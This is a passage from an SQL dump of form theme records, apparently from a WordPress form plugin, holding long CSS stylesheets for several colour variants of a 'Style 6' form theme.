!important;\nborder:1px solid #702400 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\ncolor:#702400 !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\ncolor:#702400 !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#702400 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#702400 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\nmargin-right: 62px !important;\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:5px solid #702400 !important;\nborder-radius:7px !important;\n}', 0),
(36, 'Style 6 Gray', 'table {\n font-size: 12px !important;\n}\n.wdform_table1, .wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n	line-height:1 !important;\n	border-collapse:separate !important;\n	padding-right:inherit;\n	padding-left:inherit;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1{\n	border-bottom:none;\n}\n.wdform_table1 table{\n	background-color:initial;\n}\nwdform_table2, .wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table2 table{\n	border-width:inherit !important;\n}\ntable.wdform_table1, .wdform_table1 table{\n	border:0px !important;\n}\n.wdform_table2 td{\n	text-align:left !important;\n	border-width:inherit !important;\n}\n.wdform_table1 table, .wdform_table1 tbody{\n	border-collapse:separate !important;\n}\n.wdform_table1 td{\n	text-align:center;\n	border-collapse:separate !important;\n	line-height:1 !important;\n	border:0px none !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	vertical-align:top !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		color:#000;\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n	background-image:none !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#000000 !important;\nborder:8px solid #CCCCCC !important;\ntext-align:center !important;\nborder-radius:27px !important;\nfloat:left !important;\nposition: relative !important;\nleft:40px !important;\n}\n.wdform_tr1\n{\nborder:8px solid #000000 !important;\nvertical-align:top !important;\nwidth:100% !important;\nborder-radius:20px !important;\ndisplay: table-cell !important;\nposition: relative !important;\nleft: -40px !important;\n}\n.wdform_td1\n{\nbackground-color: #CCCCCC !important;\nborder-radius: 10px !important;\n}\n.wdform_table2\n{\npadding-right:15px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:6px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #000000 !important;\ncolor:#000000 !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder:1px solid #000000 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\ncolor:#000000 !important;\n}\n.wdform_date_fields select\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #000000 !important;\n}\n.am_pm_select\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #000000 !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder:1px solid #000000 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\ncolor:#000000 !important;\n}\n.wdform_address input\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nborder:1px solid #000000 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\ncolor:#000000 !important;\nborder:1px solid #000000 !important;\nborder-radius:4px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #000000 !important;\n}\n.wdform_colon\n{\ncolor:#000000 !important;\n}\n.wdform_separator\n{\nvertical-align:middle !important;\ncolor:#000000 !important;\n}\n.wdform_line\n{\ncolor:#000000 !important;\n}\n.time_box\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nheight:16px !important;\nborder:1px solid #000000 !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#000000 !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#000000 !important;\n}\n.label\n{\nborder:none !important;\ncolor:#000000 !important;\nfont-weight:bold !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder:1px solid #000000 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder:1px solid #000000 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-radius:4px !important;\nborder:1px solid #000000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncolor:#000000 !important;\n}\n.file_upload\n{\nborder:1px solid #000000 !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#000000 !important;\n}    \n.page_deactive\n{\ncolor:#CCCCCC !important;\nborder:0px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 2px !important;\nbackground-color:#000000 !important;\n}\n.page_active\n{\ncolor:#000000 !important;\nborder:4px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#CCCCCC !important;\nborder-radius: 9px !important;\nbox-shadow: 0px 0px 5px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#CCCCCC !important;\nborder-radius:20px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: center !important; \nbox-shadow: inset 0px 0px 10px #CCCCCC !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder: 7px solid #CCCCCC !important;\nbackground-color:#000000 !important;\nborder-radius:30px !important;\ntext-align: left !important; \npadding:5px !important;\nleft: 20px !important;\nposition: relative !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px !important;\nborder:1px solid #000000 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\ncolor:#000000 !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\ncolor:#000000 !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\nmargin-right: 62px !important;\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:5px solid #000000 !important;\nborder-radius:7px !important;\n}', 0),
(37, 'Style 6 Red - Black', 'table {\n font-size: 12px !important;\n}\n.wdform_table1, .wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n	line-height:1 !important;\n	border-collapse:separate !important;\n	padding-right:inherit;\n	padding-left:inherit;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1{\n	border-bottom:none;\n}\n.wdform_table1 table{\n	background-color:initial;\n}\nwdform_table2, .wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table2 table{\n	border-width:inherit !important;\n}\ntable.wdform_table1, .wdform_table1 table{\n	border:0px !important;\n}\n.wdform_table2 td{\n	text-align:left !important;\n	border-width:inherit !important;\n}\n.wdform_table1 table, .wdform_table1 tbody{\n	border-collapse:separate !important;\n}\n.wdform_table1 td{\n	text-align:center;\n	border-collapse:separate !important;\n	line-height:1 !important;\n	border:0px none !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	vertical-align:top !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		color:#000;\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n	background-image:none !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#000000 !important;\nborder:8px solid #F2281A !important;\ntext-align:center !important;\nborder-radius:27px !important;\nfloat:left !important;\nposition: relative !important;\nleft:40px !important;\n}\n.wdform_tr1\n{\nborder:8px solid #000000 !important;\nvertical-align:top !important;\nwidth:100% !important;\nborder-radius:20px !important;\ndisplay: table-cell !important;\nposition: relative !important;\nleft: -40px !important;\n}\n.wdform_td1\n{\nbackground-color: #F2281A !important;\nborder-radius: 10px !important;\n}\n.wdform_table2\n{\npadding-right:15px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:6px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:2px solid #000000 !important;\ncolor:#000000 !important;\nopacity:0.99 !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder:2px solid #000000 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\ncolor:#000000 !important;\n}\n.wdform_date_fields select\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:2px solid #000000 !important;\nopacity:0.99 !important;\n}\n.am_pm_select\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:2px solid #000000 !important;\nopacity:0.99 !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder:2px solid #000000 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\ncolor:#000000 !important;\n}\n.wdform_address input\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nborder:2px solid #000000 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\ncolor:#000000 !important;\nborder:2px solid #000000 !important;\nborder-radius:4px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:2px solid #000000 !important;\nopacity:0.99 !important;\n}\n.wdform_colon\n{\ncolor:#000000 !important;\n}\n.wdform_separator\n{\nvertical-align:middle !important;\ncolor:#000000 !important;\n}\n.wdform_line\n{\ncolor:#000000 !important;\n}\n.time_box\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nheight:16px !important;\nborder:2px solid #000000 !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#000000 !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#000000 !important;\n}\n.label\n{\nborder:none !important;\ncolor:#000000 !important;\nfont-weight:bold !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder:2px solid #000000 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder:2px solid #000000 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:blue\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-radius:4px !important;\nborder:2px solid #000000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncolor:#000000 !important;\n}\n.file_upload\n{\nborder:2px solid #000000 !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#000000 !important;\n}    \n.page_deactive\n{\ncolor:#F2281A !important;\nborder:0px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 2px !important;\nbackground-color:#000000 !important;\n}\n.page_active\n{\ncolor:#fff !important;\nborder:4px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#fff !important;\nbackground-image: url([SITE_ROOT]/images/button6_4.png) !important;\nborder-radius: 9px !important;\nbox-shadow: 0px 0px 5px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#F2281A !important;\nbackground-image: url([SITE_ROOT]/images/button6_4.png) !important;\nborder-radius:20px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: center !important; \nbox-shadow: inset 0px 0px 10px #F2281A !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder: 7px solid #F2281A !important;\nbackground-color:#000000 !important;\nborder-radius:30px !important;\ntext-align: left !important; \npadding:5px !important;\nleft: 20px !important;\nposition: relative !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image: url([SITE_ROOT]/images/button6_4.png) !important;\nbackground-color:#000 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image: url([SITE_ROOT]/images/button6_4.png) !important;\nbackground-color:#000 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px !important;\nborder:2px solid #000000 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\ncolor:#000000 !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\ncolor:#000000 !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image: url([SITE_ROOT]/images/button6_4.png) !important;\nbackground-color:#000 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image: url([SITE_ROOT]/images/button6_4.png) !important;\nbackground-color:#000 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\nmargin-right: 62px !important;\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:5px solid #000000 !important;\nborder-radius:7px !important;\n}', 0),
(38, 'Style 6 Orange - Blue', 'table {\n font-size: 12px !important;\n}\n.wdform_table1, .wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n	line-height:1 !important;\n	border-collapse:separate !important;\n	padding-right:inherit;\n	padding-left:inherit;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1{\n	border-bottom:none;\n}\n.wdform_table1 table{\n	background-color:initial;\n}\nwdform_table2, .wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table2 table{\n	border-width:inherit !important;\n}\ntable.wdform_table1, .wdform_table1 table{\n	border:0px !important;\n}\n.wdform_table2 td{\n	text-align:left !important;\n	border-width:inherit !important;\n}\n.wdform_table1 table, .wdform_table1 tbody{\n	border-collapse:separate !important;\n}\n.wdform_table1 td{\n	text-align:center;\n	border-collapse:separate !important;\n	line-height:1 !important;\n	border:0px none !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	vertical-align:top !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		color:#000;\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n	background-image:none !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#0090E3 !important;\nborder:8px solid #FF944C !important;\ntext-align:center !important;\nborder-radius:27px !important;\nfloat:left !important;\nposition: relative !important;\nleft:40px !important;\n}\n.wdform_tr1\n{\nborder:8px solid #0090E3 !important;\nvertical-align:top !important;\nwidth:100% !important;\nborder-radius:20px !important;\ndisplay: table-cell !important;\nposition: relative !important;\nleft: -40px !important;\n}\n.wdform_td1\n{\nbackground-color: #FF944C !important;\nborder-radius: 10px !important;\n}\n.wdform_table2\n{\npadding-right:15px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:6px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #0090E3 !important;\ncolor:#000 !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder:1px solid #0090E3 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\ncolor:#000 !important;\n}\n.wdform_date_fields select\n{\ncolor:#000 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #0090E3 !important;\n}\n.am_pm_select\n{\ncolor:#000 !important;\nborder-radius:4px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #0090E3 !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder:1px solid #0090E3 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\ncolor:#000 !important;\n}\n.wdform_address input\n{\ncolor:#000 !important;\nborder-radius:4px !important;\nborder:1px solid #0090E3 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\ncolor:#000 !important;\nborder:1px solid #0090E3 !important;\nborder-radius:4px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\ncolor:#000 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #0090E3 !important;\n}\n.wdform_colon\n{\ncolor:#000 !important;\n}\n.wdform_separator\n{\nvertical-align:middle !important;\ncolor:#000 !important;\n}\n.wdform_line\n{\ncolor:#000 !important;\n}\n.time_box\n{\ncolor:#000 !important;\nborder-radius:4px !important;\nheight:16px !important;\nborder:1px solid #0090E3 !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#000 !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#000 !important;\n}\n.label\n{\nborder:none !important;\ncolor:#000 !important;\nfont-weight:bold !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder:1px solid #0090E3 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000 !important;\nfont-style:normal !important;\nborder:1px solid #0090E3 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-radius:4px !important;\nborder:1px solid #0090E3 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncolor:#000 !important;\n}\n.file_upload\n{\nborder:1px solid #0090E3 !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#000 !important;\n}    \n.page_deactive\n{\ncolor:#FF944C !important;\nborder:0px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 2px !important;\nbackground-color:#0090E3 !important;\n}\n.page_active\n{\ncolor:#0090E3 !important;\nborder:4px solid #0090E3 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px 